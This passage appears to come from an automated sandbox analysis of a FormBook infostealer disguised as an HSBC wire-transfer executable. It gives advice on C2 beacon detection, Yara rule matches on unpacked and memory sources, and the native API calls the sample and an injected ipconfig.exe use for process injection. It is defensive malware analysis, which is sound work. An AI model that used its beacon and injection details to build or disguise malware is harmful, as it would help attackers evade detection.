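Blocking only the host in "C2 list" would have stopped none of the three requests in this capture; a rule on the path plus the two-parameter GET with a NUL body, or on the constant l0G value, covers the decoys and the real C2 alike. Parameter values are kept raw on purpose: parse_qs would turn the '+' characters in 5jblCF into spaces and break the cross-beacon comparison.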

E-Banking Fraud:

Yara detected FormBook
Source: the same 7 UNPACKEDPE and 11 MEMORY Yara match sources listed under AV Detection above.

System Summary:

Malicious sample detected (through community Yara rule)
Both community rules matched on every source listed below:
  Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
  Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Sources of type UNPACKEDPE:
  • 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack
  • 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack
  • 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack
  • 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack
  • 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack
  • 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack
  • 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack
Sources of type MEMORY:
  • 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp
  • 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp
  • 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp
  • 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp
  • 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp
  • 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp
  • 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp
  • 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp
  • 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp
  • 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp
  • 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp
Uses 32bit PE files
Source: HSBC ... Wire Transfer Copy.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: the UNPACKEDPE sources above, each matched by Formbook_1 and Formbook with the rule metadata given above; the page's listing is cut off after the Formbook_1 entry for 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 0_2_00C68250
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 0_2_00C6D2F8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_00401030
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041E30C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041DB36
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_00402D90
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_00409E5F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_00409E60
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041D6AE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_00402FB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_00C05C24
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0162F900
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016FE824
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016E1002
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F28EC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F20A8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0163B090
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0164AB40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F2B28
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016E03DA
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016EDBD2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0165ABD8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0165EBB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016DFA2B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F22AE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F1D55
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01620D20
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F2D07
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0163D5E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F25DD
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016ED466
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0163841F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F1FF1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016FDFCE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01646E30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016ED616
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016F2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0366AB40
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03712B28
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0370DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_037003DA
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0367EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036FFA2B
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_037122AE
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0364F900
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0371E824
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0366A830
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03701002
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_037128EC
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036720A0
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_037120A8
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0365B090
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03711FF1
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0371DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03666E30
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0370D616
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03712EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03711D55
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03640D20
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03712D07
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0365D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_037125DD
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03672581
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0370D466
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0365841F
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C7D6AE
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C69E5F
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C69E60
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C62FB0
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C62D90
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: String function: 0162B150 appears 133 times
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: String function: 0364B150 appears 72 times
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041A360 NtCreateFile
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041A410 NtReadFile
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041A490 NtClose
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041A540 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041A35A NtCreateFile
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0041A3B2 NtCreateFile
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016699A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016698F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016695D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016697A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016696E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669950 NtQueueApcThread
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016699D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0166B040 NtSuspendThread
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669820 NtEnumerateKey
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016698A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669B00 NtSetValueKey
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0166A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669A10 NtQuerySection
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669560 NtWriteFile
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0166AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016695F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669760 NtOpenProcess
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0166A770 NtOpenThread
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669770 NtSetInformationFile
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_0166A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669650 NtQueryValueKey
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_01669610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe; Code function: 6_2_016696D0 NtCreateKey
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036899A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036896E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036896D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036895D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0368A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689A20 NtResumeThread
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689A10 NtQuerySection
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036899D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0368B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036898F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036898A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689760 NtOpenProcess
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0368A770 NtOpenThread
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0368A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036897A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689660 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689650 NtQueryValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689560 NtWriteFile
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_03689520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_0368AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_036895F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C7A360 NtCreateFile
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C7A490 NtClose
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C7A410 NtReadFile
          Source: C:\Windows\SysWOW64\ipconfig.exe; Code function: 16_2_02C7A3B2 NtCreateFile
